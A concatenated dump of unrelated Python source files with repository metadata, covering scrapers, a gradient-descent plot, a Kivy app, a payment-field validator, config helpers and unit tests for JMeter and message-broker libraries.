w300_test_files = glob.glob(os.path.join(args.data_dir, '300W', '0?_*', '**', '*.pts'), recursive=True)
print('Found {} files from the 300W private test'.format(len(w300_test_files)))
w300_set_fname = os.path.join(args.out_dir, 'w300_test.csv')
w300_df = utils.read_pts(w300_test_files, common_path=args.data_dir)
w300_df.to_csv(w300_set_fname, header=None, index=False)
print('Saving w300 private set at {}'.format(os.path.abspath(w300_set_fname)))
| 44.590164 | 119 | 0.715074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 642 | 0.236029 |
21704be6a53209ee30b09ce10c3956a6c5b8c8ba | 1,395 | py | Python | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | 1 | 2019-03-06T19:43:25.000Z | 2019-03-06T19:43:25.000Z | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | null | null | null | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | null | null | null | import matplotlib
import numpy as np
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import random
from sympy import symbols, diff, N
def fun(X, Y):
return 2*(np.exp(-X**2 - Y**2))# - np.exp(-(X - 1)**2 - (Y - 1)**2))
def symfun(X, Y):
return 2*(np.exp(1)**(-X**2 - Y**2))# - np.exp(1)**(-(X - 1)**2 - (Y - 1)**2))
delta = 0.025
x = np.arange(-3.0, 3.0, delta)
y = np.arange(-2.0, 2.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = np.exp(-X**2 - Y**2)
Z2 = np.exp(-(X - 1)**2 - (Y - 1)**2)
Z = fun(X, Y)
fig, ax = plt.subplots()
CS = ax.contour(X, Y, Z)
ax.clabel(CS, inline=1, fontsize=10)
ax.set_title('Simplest default with labels')
o=[(random.random()-0.5)*4, (random.random()-0.5)*4]
x, y = symbols('x y', real=True)
dx=diff(symfun(x, y), x)
dy=diff(symfun(x,y), y)
d=[dx.subs({x:o[0], y:o[1]}), dy.subs({x:o[0], y:o[1]})]
alpha=0.7
i=0
while bool((d[0]**2+d[1]**2)>=1e-4) and i<1000:
d=[dx.subs({x:o[0], y:o[1]}), dy.subs({x:o[0], y:o[1]})]
no=[o[0]+d[0]*alpha, o[1]+d[1]*alpha]
#plt.plot(np.array([o[0], no[0]]), np.array([o[1], no[1]]), color="#"+hex(i)[2:]+""+hex(i)[2:]+""+hex(i)[2:])
plt.plot(o[0], o[1], color="#"+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:], marker='o')
o=no
i+=1
plt.plot(o[0], o[1], color="#"+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:], marker='o')
plt.show()
| 31.704545 | 122 | 0.5319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.174194 |
2170971213155f1239bf003e5ae24a6a445bc252 | 639 | py | Python | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | '''
Selfiebooth Baas van Horst aan de Maas 2016 - CameraPuzzle
===========================
This demonstrates using Scatter widgets with a live camera.
You should see a shuffled grid of rectangles that make up the
camera feed. You can drag the squares around to see the
unscrambled camera feed or double click to scramble the grid
again.
'''
from kivy.app import App
from kivy.uix.widget import Widget
from puzzle import Puzzle
class SelfieboothApp(App):
def build(self):
root = Widget()
puzzle = Puzzle(resolution=(640, 480), play=True)
root.add_widget(puzzle)
return root
SelfieboothApp().run()
| 23.666667 | 61 | 0.697966 | 183 | 0.286385 | 0 | 0 | 0 | 0 | 0 | 0 | 341 | 0.533646 |
217147b682f00559525d500ab3019c807cac7a67 | 521 | py | Python | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | #coding=utf-8
import requests,json
headers = {'X-Rundeck-Auth-Token': '2EcW3xe0urFLrilqUOGCVYLXSbdByk2e','Accept': 'application/json'}
headers['Content-type']='application/json'
rundeck_host= 'http://10.1.16.26:4440'
url = rundeck_host+'/api/16/project/fengyang/run/command'
data={
'project':'fengyang',
'exec':'whoami',
'filter': 'tags: member-web-1,member-web-2',
'nodeKeepgoing': False #执行错误之后是否继续
}
r = requests.post(url, headers=headers,data=json.dumps(data))
print r.status_code
print r.text
| 23.681818 | 99 | 0.712092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 309 | 0.571165 |
21716b55e61aaab71c09221c686d96dab513e84d | 2,984 | py | Python | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-20T23:55:34.000Z | 2022-03-20T23:55:34.000Z | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-10T19:26:53.000Z | 2022-03-10T19:26:53.000Z | app/models/payments.py | StartFuture/workstation-backend | 3b88946a3a7e2c9449de938d008a665fc4a17d34 | [
"MIT"
] | 1 | 2022-03-08T21:40:51.000Z | 2022-03-08T21:40:51.000Z | import re
from flask_restful import Resource, reqparse
acceptedCreditCards = {
"visa": r"/^4[0-9]{12}(?:[0-9]{3})?$/",
"mastercard": r"/^5[1-5][0-9]{14}$|^2(?:2(?:2[1-9]|[3-9][0-9])|[3-6][0-9][0-9]|7(?:[01][0-9]|20))[0-9]{12}$/",
"amex": r"/^3[47][0-9]{13}$/",
"discover": r"/^65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})$/",
"diners_club": r"/^3(?:0[0-5]|[68][0-9])[0-9]{11}$/",
"jcb": r"/^(?:2131|1800|35[0-9]{3})[0-9]{11}$/"
};
def validate_card(card_number):
count_number_of_matchs = 0
for name_compaing, card_number_regex in acceptedCreditCards.items():
if re.match(card_number, card_number_regex):
count_number_of_matchs += 1
name = name_compaing
if count_number_of_matchs == 1:
return [True, name]
if count_number_of_matchs > 1 or count_number_of_matchs == 0:
return [False, None]
def validate_cvv(cvv):
# sourcery skip: assign-if-exp, boolean-if-exp-identity, remove-unnecessary-cast
try:
cvv = int(cvv)
except Exception as error:
return False
else:
cvv = str(cvv)
if len(cvv) in {3, 4}:
return True
else:
return False
def validate_name(name):
regex_name = r"^[A-Za-z ]+$"
return bool(re.match(regex_name, name))
def validate_due_date(date):
regex_date = r"""
^(?:(?:31(\/|-|\.)(?:0?[13578]|1[02]))\1|
(?:(?:29|30)(\/|-|\.)(?:0?[1,3-9]|1[0-2])\2))(?:(?:1[6-9]|
[2-9]\d)?\d{2})$|^(?:29(\/|-|\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)
?(?:0[48]|[2468][048]|[13579][26])|(?:(?:16|[2468][048]|
[3579][26])00))))$|^(?:0?[1-9]|1\d|2[0-8])(\/|-|\.)(?:(?
:0?[1-9])|(?:1[0-2]))\4(?:(?:1[6-9]|[2-9]\d)?\d{2})$
"""
return bool(re.match(regex_date, date))
class Payments(Resource):
@staticmethod
def post():
argumentos = reqparse.RequestParser()
argumentos.add_argument('nome')
argumentos.add_argument('num_card')
argumentos.add_argument('cvv')
argumentos.add_argument('data')
dados = argumentos.parse_args()
bool_card_number, card = validate_card(dados['num_card'])
if bool_card_number:
if validate_cvv(dados['cvv']):
if validate_due_date(dados['data']):
if validate_name(dados['nome']):
return {
'msg': 'sucessfull payment',
'card': card
}
return {
'msg': 'name error'
}
return {
'msg': 'date error'
}
return {
'msg': 'cvv error'
}
return {
'msg': 'number card error'
} | 30.762887 | 142 | 0.467493 | 1,064 | 0.356568 | 0 | 0 | 1,029 | 0.344839 | 0 | 0 | 1,022 | 0.342493 |
21731e6d861a39649ea198c473c43e6a73b5f540 | 2,916 | py | Python | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 11 | 2020-03-22T13:30:21.000Z | 2021-12-25T06:23:44.000Z | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 37 | 2019-12-18T13:12:50.000Z | 2022-02-10T10:52:37.000Z | jmeter_api/configs/http_cache_manager/test_http_cache_manager.py | dashawn888/jmeter_api | 1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd | [
"Apache-2.0"
] | 5 | 2019-12-06T10:55:56.000Z | 2020-06-01T19:32:32.000Z | import xmltodict
import pytest
from jmeter_api.configs.http_cache_manager.elements import HTTPCacheManager
from jmeter_api.basics.utils import tag_wrapper
class TestHTTPCacheManagerArgs:
class TestClearCacheEachIteration:
def test_check(self):
with pytest.raises(TypeError):
HTTPCacheManager(clear_each_iteration="False")
def test_check2(self):
with pytest.raises(TypeError):
HTTPCacheManager(clear_each_iteration=123456)
def test_positive(self):
cache_manager = HTTPCacheManager(clear_each_iteration=True)
assert cache_manager.clear_each_iteration is True
class TestUseCacheControl:
def test_check(self):
with pytest.raises(TypeError):
HTTPCacheManager(use_cache_control="False")
def test_check2(self):
with pytest.raises(TypeError):
HTTPCacheManager(use_cache_control=12345)
def test_positive(self):
cache_manager = HTTPCacheManager(use_cache_control=False)
assert cache_manager.use_cache_control is False
class TestMaxElementsInCache:
def test_check(self):
with pytest.raises(TypeError):
HTTPCacheManager(max_elements_in_cache="test")
def test_check2(self):
with pytest.raises(TypeError):
HTTPCacheManager(max_elements_in_cache="120")
def test_positive(self):
cache_manager = HTTPCacheManager(max_elements_in_cache=100)
assert cache_manager.max_elements_in_cache == 100
class TestHTTPCacheManagerRender:
def test_clear_each_iteration(self):
element = HTTPCacheManager(clear_each_iteration=False,
use_cache_control=True,
max_elements_in_cache=100)
rendered_doc = tag_wrapper(element.to_xml(), 'result')
parsed_doc = xmltodict.parse(rendered_doc)
assert parsed_doc['result']['CacheManager']['boolProp'][0]['#text'] == 'false'
def test_use_cache_control(self):
element = HTTPCacheManager(clear_each_iteration=False,
use_cache_control=True,
max_elements_in_cache=100)
rendered_doc = tag_wrapper(element.to_xml(), 'result')
parsed_doc = xmltodict.parse(rendered_doc)
assert parsed_doc['result']['CacheManager']['boolProp'][1]['#text'] == 'true'
def test_max_elements_in_cache(self):
element = HTTPCacheManager(clear_each_iteration=False,
use_cache_control=True,
max_elements_in_cache=100)
rendered_doc = tag_wrapper(element.to_xml(), 'result')
parsed_doc = xmltodict.parse(rendered_doc)
assert parsed_doc['result']['CacheManager']['intProp']['#text'] == '100'
| 39.405405 | 86 | 0.645405 | 2,754 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.062757 |
21749d76cf64e34fef78fa86bc1d6551d9be27aa | 1,533 | py | Python | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | null | null | null | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | 1 | 2020-12-10T14:40:57.000Z | 2020-12-10T14:40:57.000Z | main/configuration/token_config.py | anderswodenker/sams-app | d9ab3474a5b1f009afe803d14484c000059b61c3 | [
"MIT"
] | null | null | null | import configparser
import mapping
from main.helper.time_helper import get_token_time
class TokenConfig:
def __init__(self):
self.config = configparser.ConfigParser()
self.config_data = self.config['DEFAULT']
self.config.read(mapping.token_config)
def read_token(self):
self.config.read(mapping.token_config)
token = self.config['DEFAULT']['token']
last_token = self.config['DEFAULT']['last_token']
expires_in = self.config['DEFAULT']['expires_in']
return {"token": token, "last_token": last_token, "expires_in": expires_in}
def read_token_error(self):
self.config.read(mapping.token_config)
error = self.config_data['token_error']
return error
def write_token(self, token, expires_in):
self.config.set("DEFAULT", "token", token)
self.config.set("DEFAULT", "last_token", get_token_time())
self.config.set("DEFAULT", "expires_in", expires_in)
self.write_config()
def write_token_error(self, error):
self.config.set("DEFAULT", "token_error", error)
self.write_config()
def reset_token(self):
self.config.set("DEFAULT", "token", "")
self.config.set("DEFAULT", "last_token", "")
self.config.set("DEFAULT", "expires_in", "")
self.write_config()
def write_config(self):
try:
with open(mapping.token_config, 'w') as configfile:
self.config.write(configfile)
except IOError:
pass
| 32.617021 | 83 | 0.637965 | 1,444 | 0.941944 | 0 | 0 | 0 | 0 | 0 | 0 | 258 | 0.168297 |
21758ae5b904cd586ad12411253dc0f4bd9495ef | 350 | py | Python | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 1 | 2019-05-22T08:46:09.000Z | 2019-05-22T08:46:09.000Z | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 118 | 2016-04-04T12:27:15.000Z | 2021-08-18T01:46:13.000Z | tests/data/dos.py | granrothge/multiphonon | 486a998eeb6b73b964a58ba0f98fe3ece15bdf6e | [
"MIT"
] | 5 | 2017-09-28T16:01:12.000Z | 2020-01-31T18:58:09.000Z | #!/usr/bin/env python
#
# Jiao Lin <jiao.lin@gmail.com>
import os
datadir = os.path.abspath(os.path.dirname(__file__))
def loadDOS():
f = os.path.join(datadir, 'V-dos.dat')
from multiphonon.dos import io
E, Z, error = io.fromascii(f)
from multiphonon.dos.nice import nice_dos
E,g = nice_dos(E, Z)
return E,g
# End of file
| 19.444444 | 52 | 0.66 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 77 | 0.22 |
217837f8dc006967d37900044e0628322b10a71d | 5,832 | py | Python | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | weather/Weather.py | Eajay/chatting-bot-with-tasks | d02299cb9d84da719eec4950a69484058adc791a | [
"MIT"
] | null | null | null | from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
import re
import pymysql
import geocoder
import datetime
import os
class Weather:
def __init__(self, host, user, passwd, db, port):
settings_file_path = 'weather.weather.settings' # The path seen from root, ie. from main.py
os.environ.setdefault('SCRAPY_SETTINGS_MODULE', settings_file_path)
self.process = CrawlerProcess(get_project_settings())
self.location = geocoder.ip('me').address
self.date = datetime.date.today()
self.text = ""
self.data = {}
self.conn = pymysql.connect(host=host, user=user, passwd=passwd, db=db, port=port)
self.cursor = self.conn.cursor()
self.renew_table()
def renew_table(self):
self._get_web_page()
self._get_data()
self._create_sql_table()
def _get_web_page(self):
"""
:return: the content of html file
"""
self.process.crawl('weather')
self.process.start()
self.filename = 'weather.html'
with open(self.filename, 'r') as f:
data = f.readlines()
self.text = ' '.join(data)
def _get_data(self):
"""
:return: data in dictionary format
"""
dic = {}
# description
description = re.findall(r'<td class="twc-sticky-col" headers="day" title=(.*?) data-track-string', self.text)
description = [val[1:-1] for val in description]
dic['description'] = description
# day_time
day_time = re.findall(r'<span class="date-time">(.*?)</span>', self.text)
dic['day_time'] = day_time
# day_detail
day_detail = re.findall(r'<span class="day-detail clearfix">(.*?)</span>', self.text)
dic['day_detail'] = day_detail
# simple_description
simple_description = re.findall(r'<td class="description".*?<span>(.*?)</span></td>', self.text)
dic['simple_description'] = simple_description
# highest and lowest temperature
highest_temperature = re.findall(
r'<div><span>(.*?)</span><span class="slash"|<div><span class="">(.*?)<sup>°</sup></span><span class="slash"',
self.text)
lowest_temperature = re.findall(
r'"slash"></span><span class="">(.*?)<sup>°</sup></span></div>|"slash"></span><span>(.*?)</span></div>',
self.text)
for i, val in enumerate(highest_temperature):
if val[0]:
highest_temperature[i] = val[0]
else:
highest_temperature[i] = val[1]
for i, val in enumerate(lowest_temperature):
if val[0]:
lowest_temperature[i] = val[0]
else:
lowest_temperature[i] = val[1]
dic['highest_temperature'] = highest_temperature
dic['lowest_temperature'] = lowest_temperature
# precip
precip = re.findall(r'icon-drop-1"></span><span class=""><span>(.*?)<span', self.text)
dic['precip'] = precip
# wind
wind = re.findall(r'"wind"><span class="">(.*?)</span></td>', self.text)
dic['wind'] = wind
# humidity
humidity = re.findall(r'"humidity"><span class=""><span>(.*?)<span', self.text)
dic['humidity'] = humidity
self.data = dic
def _create_sql_table(self):
"""
create sql table and insert data
"""
self.cursor.execute('SHOW TABLES')
if ('weather',) in self.cursor:
self.cursor.execute('DROP TABLE weather')
self.conn.commit()
sql_Q_create_table = "CREATE TABLE weather(date varchar(32) NOT NULL, date_week TEXT, description TEXT, simple_description TEXT, highest_temp TEXT, lowest_temp TEXT, precip TEXT, wind TEXT, humidity TEXT, PRIMARY KEY(date))"
self.cursor.execute(sql_Q_create_table)
self.conn.commit()
for i in range(len(self.data['day_detail'])):
sql_Q_insert = "INSERT INTO weather (date, date_week, description, simple_description, highest_temp, lowest_temp, precip, wind, humidity) values('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (self.data['day_detail'][i], self.data['day_time'][i], self.data['description'][i], self.data['simple_description'][i], self.data['highest_temperature'][i], self.data['lowest_temperature'][i], self.data['precip'][i], self.data['wind'][i], self.data['humidity'][i])
self.cursor.execute(sql_Q_insert)
self.conn.commit()
def _transfer_date(self, value):
temp = value.ctime().split(' ')
if temp[2] == '':
return temp[1].upper() + ' ' + temp[3]
return temp[1].upper() + ' ' + temp[2]
def select_data(self, content):
if 'tomorrow' in content:
date = self._transfer_date(value=self.date + datetime.timedelta(days=1))
sql_Q_select = "SELECT description from weather WHERE date = \'%s\'" % date
self.cursor.execute(sql_Q_select)
rows = self.cursor.fetchall()
return "Tomorrow in " + self.location + " : " + rows[0][0]
else:
date = self._transfer_date(value=self.date)
sql_Q_select = "SELECT description from weather WHERE date = \'%s\'" % date
self.cursor.execute(sql_Q_select)
rows = self.cursor.fetchall()
return "Today in " + self.location + " : " + rows[0][0]
# host = 'localhost'
# user = 'root'
# passwd = '123456'
# db = 'mydb'
# port = 3306
# w = Weather(host=host, user=user, passwd=passwd, db=db, port=port)
# print(w.select_data(content='today'))
| 38.368421 | 479 | 0.573217 | 5,449 | 0.934008 | 0 | 0 | 0 | 0 | 0 | 0 | 2,036 | 0.348989 |
21784a3d87f08299948e420bf102a93e46449e8b | 7,578 | py | Python | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | 7 | 2021-04-12T15:40:11.000Z | 2022-03-04T13:46:01.000Z | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | 275 | 2021-04-03T09:23:40.000Z | 2022-01-28T11:56:25.000Z | tests/test_networks/test_brokers/test_publishers/test_producers.py | Clariteia/minos_microservice_networks | 77f239429653272c5cb3447311513143f8521ed9 | [
"MIT"
] | null | null | null | import asyncio
import unittest
from asyncio import (
gather,
sleep,
)
from unittest.mock import (
AsyncMock,
call,
)
from uuid import (
uuid4,
)
import aiopg
from minos.common import (
NotProvidedException,
)
from minos.common.testing import (
PostgresAsyncTestCase,
)
from minos.networks import (
BrokerConsumer,
BrokerMessageStatus,
BrokerMessageStrategy,
BrokerProducer,
BrokerPublisher,
)
from tests.utils import (
BASE_PATH,
FakeModel,
)
class TestProducer(PostgresAsyncTestCase):
CONFIG_FILE_PATH = BASE_PATH / "test_config.yml"
def setUp(self) -> None:
super().setUp()
self.consumer = BrokerConsumer.from_config(self.config)
self.producer = BrokerProducer.from_config(self.config, consumer=self.consumer)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.consumer.setup()
await self.producer.setup()
async def asyncTearDown(self):
await self.producer.destroy()
await self.consumer.destroy()
await super().asyncTearDown()
def test_from_config_default(self):
self.assertIsInstance(self.producer, BrokerProducer)
async def test_from_config_raises(self):
with self.assertRaises(NotProvidedException):
BrokerProducer.from_config(config=self.config)
async def test_dispatch_one_internal_true(self):
mock = AsyncMock()
self.consumer.enqueue = mock
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("GetOrder", -1, bytes()), mock.call_args)
async def test_dispatch_one_internal_false(self):
self.producer.consumer = None
publish_mock = AsyncMock()
self.producer.publish = publish_mock
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, publish_mock.call_count)
self.assertEqual(call("GetOrder", bytes()), publish_mock.call_args)
async def test_dispatch_one_external_true(self):
mock = AsyncMock()
self.producer.publish = mock
ok = await self.producer.dispatch_one((0, "GetProduct", bytes(), BrokerMessageStrategy.UNICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("GetProduct", bytes()), mock.call_args)
async def test_dispatch_one_external_true_event(self):
mock = AsyncMock()
self.producer.publish = mock
ok = await self.producer.dispatch_one((0, "TicketAdded", bytes(), BrokerMessageStrategy.MULTICAST))
self.assertTrue(ok)
self.assertEqual(1, mock.call_count)
self.assertEqual(call("TicketAdded", bytes()), mock.call_args)
async def test_dispatch_one_external_false(self):
self.producer.publish = AsyncMock(return_value=False)
ok = await self.producer.dispatch_one((0, "GetOrder", bytes(), BrokerMessageStrategy.MULTICAST))
self.assertFalse(ok)
async def test_publish_true(self):
ok = await self.producer.publish(topic="TestKafkaSend", message=bytes())
self.assertTrue(ok)
async def test_publish_false(self):
self.producer.client.send_and_wait = AsyncMock(side_effect=ValueError)
ok = await self.producer.publish(topic="TestKafkaSend", message=bytes())
self.assertFalse(ok)
async def test_dispatch_forever(self):
mock = AsyncMock(side_effect=ValueError)
self.producer.dispatch = mock
try:
await gather(self.producer.dispatch_forever(), self._notify("producer_queue"))
except ValueError:
pass
self.assertEqual(1, mock.call_count)
async def test_dispatch_forever_without_notify(self):
mock_dispatch = AsyncMock(side_effect=[None, ValueError])
mock_count = AsyncMock(side_effect=[1, 0, 1])
self.producer.dispatch = mock_dispatch
self.producer._get_count = mock_count
try:
await self.producer.dispatch_forever(max_wait=0.01)
except ValueError:
pass
self.assertEqual(2, mock_dispatch.call_count)
self.assertEqual(3, mock_count.call_count)
async def test_concurrency_dispatcher(self):
model = FakeModel("foo")
identifier = uuid4()
broker_publisher = BrokerPublisher.from_config(config=self.config)
async with broker_publisher:
for x in range(60):
await broker_publisher.send(
model, "CommandBroker-Delete", identifier=identifier, reply_topic="TestDeleteReply"
)
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute("SELECT COUNT(*) FROM producer_queue")
records = await cur.fetchone()
assert records[0] == 60
await asyncio.gather(*(self.producer.dispatch() for _ in range(6)))
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute("SELECT COUNT(*) FROM producer_queue")
records = await cur.fetchone()
assert records[0] == 0
async def test_if_commands_was_deleted(self):
async with BrokerPublisher.from_config(config=self.config) as broker_publisher:
await broker_publisher.send(FakeModel("Foo"), "TestDeleteReply")
await broker_publisher.send(FakeModel("Foo"), "TestDeleteReply")
await self.producer.dispatch()
async with aiopg.connect(**self.broker_queue_db) as connection:
async with connection.cursor() as cursor:
await cursor.execute("SELECT COUNT(*) FROM producer_queue WHERE topic = '%s'" % "TestDeleteReply")
self.assertEqual(0, (await cursor.fetchone())[0])
async def test_if_commands_retry_was_incremented(self):
model = FakeModel("foo")
identifier = uuid4()
async with BrokerPublisher.from_config(config=self.config) as broker_publisher:
await broker_publisher.send(
model, "TestDeleteOrderReply", identifier=identifier, status=BrokerMessageStatus.SUCCESS
)
await broker_publisher.send(
model, "TestDeleteOrderReply", identifier=identifier, status=BrokerMessageStatus.SUCCESS
)
self.producer.publish = AsyncMock(return_value=False)
await self.producer.dispatch()
async with aiopg.connect(**self.broker_queue_db) as connection:
async with connection.cursor() as cursor:
await cursor.execute("SELECT COUNT(*) FROM producer_queue WHERE topic = 'TestDeleteOrderReply'")
self.assertEqual(2, (await cursor.fetchone())[0])
await cursor.execute("SELECT retry FROM producer_queue WHERE id=1;")
self.assertEqual(1, (await cursor.fetchone())[0])
await cursor.execute("SELECT retry FROM producer_queue WHERE id=2;")
self.assertEqual(1, (await cursor.fetchone())[0])
async def _notify(self, name):
await sleep(0.2)
async with aiopg.connect(**self.broker_queue_db) as connect:
async with connect.cursor() as cur:
await cur.execute(f"NOTIFY {name!s};")
if __name__ == "__main__":
unittest.main()
| 35.246512 | 114 | 0.662048 | 7,025 | 0.927026 | 0 | 0 | 0 | 0 | 6,525 | 0.861045 | 642 | 0.084719 |
217c49f0f1aaaa2893f92203a3e95b9ea7c76395 | 4,489 | py | Python | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | text_collector/spiders/sumut_go.py | gusman/web-crawler | d7a41cab2ce82d0e6b0daf5db05944381f0a4bbd | [
"MIT"
] | null | null | null | import scrapy
import datetime
import re
from datetime import timedelta
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
class ItemNews(scrapy.Item):
date = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field()
class SultraZonaSpider(scrapy.Spider):
max_empty = 3
counter_empty = 0
name = "sumut_go"
allowed_domains = [ 'gosumut.com' ]
start_urls = [
'https://www.gosumut.com/news-index/?indexDate=29&indexMonth=03&indexYear=2020&Submit=Tampilkan'
# 'https://www.gosumut.com/news-index/?indexDate=20&indexMonth=11&indexYear=2015&Submit=Tampilkan'
]
def get_date_from_url(self, url):
result = re.search('indexDate=[0-9]{2}', url)
result = re.search('[0-9]{2}', result.group(0))
date_d = result.group(0)
result = re.search('indexMonth=[0-9]{2}', url)
result = re.search('[0-9]{2}', result.group(0))
date_m = result.group(0)
result = re.search('indexYear=[0-9]{4}', url)
result = re.search('[0-9]{4}', result.group(0))
date_y = result.group(0)
self.logger.info('\n >> date text: [%s/%s/%s]\n', date_y, date_m, date_d)
return date_y, date_m, date_d
def construct_page_url_by_date(self, date_str):
l_str = date_str.split('/')
date_y, date_m, date_d = str(l_str[0]), str(l_str[1]), str(l_str[2])
url = "https://www.gosumut.com/news-index/?indexDate=" + date_d + "&indexMonth=" + date_m + "&indexYear=" + date_y + "&Submit=Tampilkan"
return url
def parse(self, response):
""" Retrieve article list """
self.logger.info('\n >> PROCESSING in parse %s\n', response.url)
n_news = len(response.xpath('//div[@class="newslist"]//a'))
#next_url = response.xpath('//i[@class="td-icon-menu-right"]/ancestor::a/@href').get()
next_url = None
date_y, date_m, date_d = self.get_date_from_url(response.url)
self.logger.info('\n >> n_news : %d\n', n_news)
self.logger.info('\n >> %s, %s, %s\n', date_y, date_m, date_d)
if 0 < n_news:
self.counter_empty = 1
""" Scrap all news list """
news_urls = response.xpath('//div[@class="newslist"]//a/@href');
for news_url in news_urls:
""" Get news url """
url = news_url.get()
url = "https://www.gosumut.com" + url
self.logger.info('\n >> PROCESSING in scrapy request %s\n', url)
yield scrapy.Request(url, callback=self.parse_news_page)
else:
self.logger.info("\n >> Found empty page, counter_empty: %d\n", self.counter_empty)
self.counter_empty += 1
if 3 > self.counter_empty:
self.logger.info('\n >> next url : %s\n', next_url)
if None == next_url:
""" Get previous date """
curr_date = datetime.datetime(int(date_y), int(date_m), int(date_d))
prev_date = curr_date - timedelta(days = 1)
prev_date_str = prev_date.strftime("%Y/%m/%d")
self.logger.info('\n >> Retrieved date %s/%s/%s\n', date_y, date_m, date_d)
self.logger.info('\n >> Previous date %s\n', prev_date_str)
next_url = self.construct_page_url_by_date(prev_date_str)
self.logger.info('\n >> PROCESSING in scrapy request %s\n', next_url)
yield scrapy.Request(next_url, callback=self.parse)
else:
yield scrapy.Request(next_url, callback=self.parse)
else:
self.logger.info("\n >> Reach end of index page : counter_empty: %d\n", self.counter_empty)
def parse_news_page(self, response):
self.logger.info('>> PROCESSING in parse_detail %s\n', response.url)
item = ItemNews()
item['title'] = response.xpath('//div[@class="news-box-view" and @itemprop="articleBody"]/h1/text()').get()
item['date'] = response.xpath('//div[@class="time"]/text()').get().strip()
content = response.xpath('//div[@class="news-content"]//text()[parent::p or parent::strong or parent::div[@class="news-box-desc-right"]]').getall()
content = [ c.strip() for c in content if 0 < len(c.strip()) ]
content = [ c.replace("\r\n", " ") for c in content ]
content = [ c.replace("\n", " ") for c in content ]
item['content'] = "".join(content)
yield item
| 45.343434 | 155 | 0.58699 | 4,321 | 0.962575 | 2,900 | 0.646024 | 0 | 0 | 0 | 0 | 1,350 | 0.300735 |
